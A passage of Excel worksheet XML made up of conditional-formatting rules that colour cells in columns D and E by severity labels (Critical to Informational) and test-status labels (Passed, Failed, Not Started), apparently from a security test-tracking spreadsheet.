      <formula>NOT(ISERROR(SEARCH("N/A",E106)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="641" priority="770" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E106)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="640" priority="771" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E106)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E106">
    <cfRule type="containsText" dxfId="639" priority="768" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E106)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="638" priority="769" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E106)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E105">
    <cfRule type="containsText" dxfId="637" priority="750" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E105)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="636" priority="751" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E105)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="635" priority="752" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E105)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="634" priority="753" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E105)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="633" priority="754" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E105)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="632" priority="755" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E105)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="631" priority="756" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E105)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="630" priority="759" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E105)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="629" priority="760" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E105)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E105">
    <cfRule type="containsText" dxfId="628" priority="757" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E105)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="627" priority="758" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E105)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E109">
    <cfRule type="containsText" dxfId="626" priority="739" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E109)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="625" priority="740" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E109)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="624" priority="741" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E109)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="623" priority="742" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E109)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="622" priority="743" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E109)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="621" priority="744" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E109)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="620" priority="745" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E109)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="619" priority="748" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E109)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="618" priority="749" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E109)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E110">
    <cfRule type="containsText" dxfId="617" priority="728" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E110)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="616" priority="729" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E110)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="615" priority="730" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E110)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="614" priority="731" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E110)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="613" priority="732" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E110)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="612" priority="733" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E110)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="611" priority="734" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E110)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="610" priority="737" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E110)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="609" priority="738" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E110)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E110">
    <cfRule type="containsText" dxfId="608" priority="735" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E110)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="607" priority="736" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E110)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E111">
    <cfRule type="containsText" dxfId="606" priority="717" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E111)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="605" priority="718" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E111)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="604" priority="719" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E111)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="603" priority="720" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E111)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="602" priority="721" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E111)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="601" priority="722" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E111)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="600" priority="723" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E111)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="599" priority="726" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E111)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="598" priority="727" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E111)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E111">
    <cfRule type="containsText" dxfId="597" priority="724" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E111)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="596" priority="725" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E111)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E115">
    <cfRule type="containsText" dxfId="595" priority="706" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E115)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="594" priority="707" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E115)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="593" priority="708" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E115)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="592" priority="709" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E115)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="591" priority="710" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E115)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="590" priority="711" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E115)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="589" priority="712" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E115)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="588" priority="715" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E115)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="587" priority="716" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E115)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E115">
    <cfRule type="containsText" dxfId="586" priority="713" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E115)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="585" priority="714" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E115)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E116">
    <cfRule type="containsText" dxfId="584" priority="695" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E116)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="583" priority="696" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E116)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="582" priority="697" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E116)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="581" priority="698" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E116)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="580" priority="699" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E116)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="579" priority="700" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E116)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="578" priority="701" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E116)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="577" priority="704" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E116)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="576" priority="705" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E116)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E116">
    <cfRule type="containsText" dxfId="575" priority="702" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E116)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="574" priority="703" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E116)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E117">
    <cfRule type="containsText" dxfId="573" priority="684" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E117)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="572" priority="685" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E117)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="571" priority="686" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E117)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="570" priority="687" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E117)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="569" priority="688" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E117)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="568" priority="689" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E117)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="567" priority="690" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E117)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="566" priority="693" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E117)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="565" priority="694" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E117)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E117">
    <cfRule type="containsText" dxfId="564" priority="691" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E117)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="563" priority="692" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E117)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E118">
    <cfRule type="containsText" dxfId="562" priority="673" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E118)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="561" priority="674" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E118)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="560" priority="675" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E118)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="559" priority="676" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E118)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="558" priority="677" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E118)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="557" priority="678" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E118)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="556" priority="679" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E118)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="555" priority="682" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E118)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="554" priority="683" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E118)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E118">
    <cfRule type="containsText" dxfId="553" priority="680" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E118)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="552" priority="681" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E118)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E120">
    <cfRule type="containsText" dxfId="551" priority="651" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E120)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="550" priority="652" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E120)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="549" priority="653" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E120)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="548" priority="654" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E120)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="547" priority="655" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E120)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="546" priority="656" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E120)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="545" priority="657" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E120)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="544" priority="660" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E120)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="543" priority="661" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E120)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E120">
    <cfRule type="containsText" dxfId="542" priority="658" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E120)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="541" priority="659" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E120)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D112:D113">
    <cfRule type="containsText" dxfId="540" priority="649" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D112)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="539" priority="650" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D112)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E112:E113">
    <cfRule type="containsText" dxfId="538" priority="636" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E112)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="537" priority="637" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E112)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="536" priority="638" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E112)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="535" priority="639" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E112)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="534" priority="640" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E112)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="533" priority="641" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E112)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="532" priority="642" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E112)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="531" priority="645" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E112)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="530" priority="646" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E112)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E112:E113">
    <cfRule type="containsText" dxfId="529" priority="643" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E112)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="528" priority="644" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E112)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D114">
    <cfRule type="containsText" dxfId="527" priority="634" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D114)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="526" priority="635" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D114)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D114">
    <cfRule type="containsText" dxfId="525" priority="632" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D114)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="524" priority="633" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D114)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E114">
    <cfRule type="containsText" dxfId="523" priority="621" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E114)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="522" priority="622" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E114)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="521" priority="623" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E114)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="520" priority="624" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E114)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="519" priority="625" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E114)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="518" priority="626" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E114)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="517" priority="627" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E114)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="516" priority="630" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E114)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="515" priority="631" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E114)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E114">
    <cfRule type="containsText" dxfId="514" priority="628" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E114)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="513" priority="629" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E114)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D19">
    <cfRule type="containsText" dxfId="512" priority="619" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D19)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="511" priority="620" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D19)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D19">
    <cfRule type="containsText" dxfId="510" priority="617" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D19)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="509" priority="618" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D19)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D20 D22">
    <cfRule type="containsText" dxfId="508" priority="615" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="507" priority="616" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D20)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D20 D22">
    <cfRule type="containsText" dxfId="506" priority="613" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="505" priority="614" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D20)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E19">
    <cfRule type="containsText" dxfId="504" priority="602" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E19)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="503" priority="603" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E19)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="502" priority="604" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E19)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="501" priority="605" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E19)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="500" priority="606" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E19)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="499" priority="607" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E19)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="498" priority="608" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E19)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="497" priority="611" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E19)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="496" priority="612" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E19)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E19">
    <cfRule type="containsText" dxfId="495" priority="609" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E19)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="494" priority="610" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E19)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E22">
    <cfRule type="containsText" dxfId="493" priority="580" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E22)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="492" priority="581" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E22)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="491" priority="582" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E22)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="490" priority="583" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E22)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="489" priority="584" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E22)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="488" priority="585" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E22)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="487" priority="586" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E22)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="486" priority="589" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E22)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="485" priority="590" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E22)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E22">
    <cfRule type="containsText" dxfId="484" priority="587" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",E22)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="483" priority="588" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",E22)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D23 D28:D31">
    <cfRule type="containsText" dxfId="482" priority="578" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",D23)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="481" priority="579" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",D23)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D23 D28:D31">
    <cfRule type="containsText" dxfId="480" priority="576" operator="containsText" text="Not Required">
      <formula>NOT(ISERROR(SEARCH("Not Required",D23)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="479" priority="577" operator="containsText" text="Not Started">
      <formula>NOT(ISERROR(SEARCH("Not Started",D23)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E23 E28:E31">
    <cfRule type="containsText" dxfId="478" priority="565" operator="containsText" text="Critical">
      <formula>NOT(ISERROR(SEARCH("Critical",E23)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="477" priority="566" operator="containsText" text="High">
      <formula>NOT(ISERROR(SEARCH("High",E23)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="476" priority="567" operator="containsText" text="Medium">
      <formula>NOT(ISERROR(SEARCH("Medium",E23)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="475" priority="568" operator="containsText" text="Low">
      <formula>NOT(ISERROR(SEARCH("Low",E23)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="474" priority="569" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E23)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="473" priority="570" operator="containsText" text="Informational">
      <formula>NOT(ISERROR(SEARCH("Informational",E23)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="472" priority="571" operator="containsText" text="N/A">
      <formula>NOT(ISERROR(SEARCH("N/A",E23)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="471" priority="574" operator="containsText" text="Failed">
      <formula>NOT(ISERROR(SEARCH("Failed",E23)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="470" priority="575" operator="containsText" text="Passed">
      <formula>NOT(ISERROR(SEARCH("Passed",E23)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E23 E28:E31">
    <cfRule type="containsText" dxfId="469" priority="572" operator="containsText" text="Not Required">
